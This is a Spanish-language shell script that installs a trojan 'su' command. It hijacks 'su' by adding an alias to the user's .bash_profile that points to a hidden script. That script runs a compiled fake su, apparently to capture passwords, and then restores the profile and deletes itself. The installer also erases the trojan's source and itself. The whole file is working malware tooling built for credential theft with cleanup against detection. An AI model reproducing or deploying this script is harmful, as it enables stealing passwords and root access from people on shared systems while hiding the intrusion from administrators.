#!/bin/sh
# TSU-1.1
# instalar.sh v. 1.1 (tsu_inst.sh) - Instalador del 'su' troyano
# Requerimientos: Codigo fuente del troyano fsu.c, o su version compilada
#                 Acceso a compilador
#
# Uso: ./instalar.sh
#
# Autor: T. Nahual (Raza-Mexicana)
#

# Lo mas probable es que no tengan que hacer ninguna modificacion
# al script

# Destruir este script y el codigo fuente fsu.c despues de instalacion?
# A menos que se esten haciendo pruebas, dejar su valor en 1
# De otra manera, poner 0
#
DESTRUIR=1

# Directorio personal
#
DIR=$HOME

# Nombre del shell script principal
#
SUSCR=$DIR/.su

# Nombre del programa troyano
#
FSU=$DIR/.fsu


# Definir el script de inicializacion
# .bash_profile tiene preferencia sobre otros archivos de inicialzacion (en BASH)
#
INIT=$DIR/.bash_profile

# Scripts de inicializacion secundarios a .bash_profile
INIT1=$DIR/.bash_login
INIT2=$DIR/.profile

# Archivo de respaldo
#
INITBAK=$DIR/.init.bak

# Codigo fuente de fsu
#
FSUSRC=$PWD/fsu.c

# Analizador de texto
#
GREP=fgrep

# Compilador
#
CC=gcc

# Archivo leeme
#
LEEME=LEEME
# Archivos tar y tar.gz
#
TAR=tsu.tar
TARGZ=tsu.tar.gz


# ---- No debe haber necesidad de modificar lo demas ----

if [ -e $LEEME ]; then
	rm $LEEME
fi


# Verificar, y crear si es necesario, el archivo de inicializacion .bash_profile
#
if [ ! -e $INIT ]; then
    touch $INIT
# Borrar archivo de inicializacion
    DELINIT=1
fi


# Asegurarse de que no este instalado el troyano ya
# (Algo poco posible, a menos que la coca y aspirinas ya no esten
# haciendo efecto!)
#

$GREP "alias su=\"source $SUSCR\"" $INIT | cut -f3 -d" " | cut -f1 -d\" > vrf_inst.tmp
read VRFINST < vrf_inst.tmp

rm vrf_inst.tmp

if [ ! -z $VRFINST ]; then
	echo "El programa ya esta instalado, vete a dormir"
	exit 0

fi

# Hacer una copia de respaldo del script de inicializacion
#
cp $INIT $INITBAK


# A~adir codigo para correr otros archivos de inicializacion, si es
# que existen
if [ $DELINIT ]; then
    if [ -e $INIT1 ]; then
	echo -e "\nsource $INIT1" >> $INIT
	elif [ -e $INIT2 ]; then
	echo -e "\nsource $INIT2" >> $INIT
    fi
fi

# A~adir el alias apropiado al archivo de inicializacion
#
echo -e "\nalias su=\"source $SUSCR\"" >> $INIT


# Generar script activador del troyano
# Limpia cualquier rastro despues de ser activado
#
echo "#!/bin/sh
unalias su
$FSU
mv $INITBAK $INIT
rm $FSU
rm $SUSCR
" > $DIR/.su

# Si .bash_profile no existia, borrar el que fue generado durante instalacion
if [ $DELINIT ]; then
    echo "rm $INIT" >> $DIR/.su
fi

# ----------------



# Borrar las versiones archivadas y comprimidas de tsu, si es que existen
#
if [ -e $TAR ]; then
    rm $TAR
fi

if [ -e $TARGZ ]; then
    rm $TARGZ
fi


# Compilar falso 'su'.
# Si existe ya, sera reemplazado.
#
if [ ! -e $FSUSRC ]; then
    echo "Advertencia: El codigo fuente $FSUSRC no existe."

    if [ -e $FSU ]; then
	echo "Advertencia: $FSU parece existir ya, no sera compilado"
	echo -e "Instalacion completada.\nHora de salir."

	if [ $(($DESTRUIR==0)) = 1 ]; then
	    echo "Acordarse de borrar $0!"
	fi

	rm $0

	exit 0

    else
	echo "Error: No se encontro $FSU"
	echo "Instalacion abortada.\nVerificar componentes."
	mv $INITBAK $INIT
	rm $SUSCR
	exit 1

    fi

    exit 1

else
    $CC -o $FSU $FSUSRC
    echo -e "Instalacion completada.\nHora de salir."

fi


if [ $(($DESTRUIR==0)) = 1 ]; then
    echo "Acordarse de borrar $0 y $FSUSRC !"
    exit 0
fi


# Borrar codigo fuente del troyano
rm $FSUSRC

# Borrar script de instalacion
rm $0

exit 0

# FIN
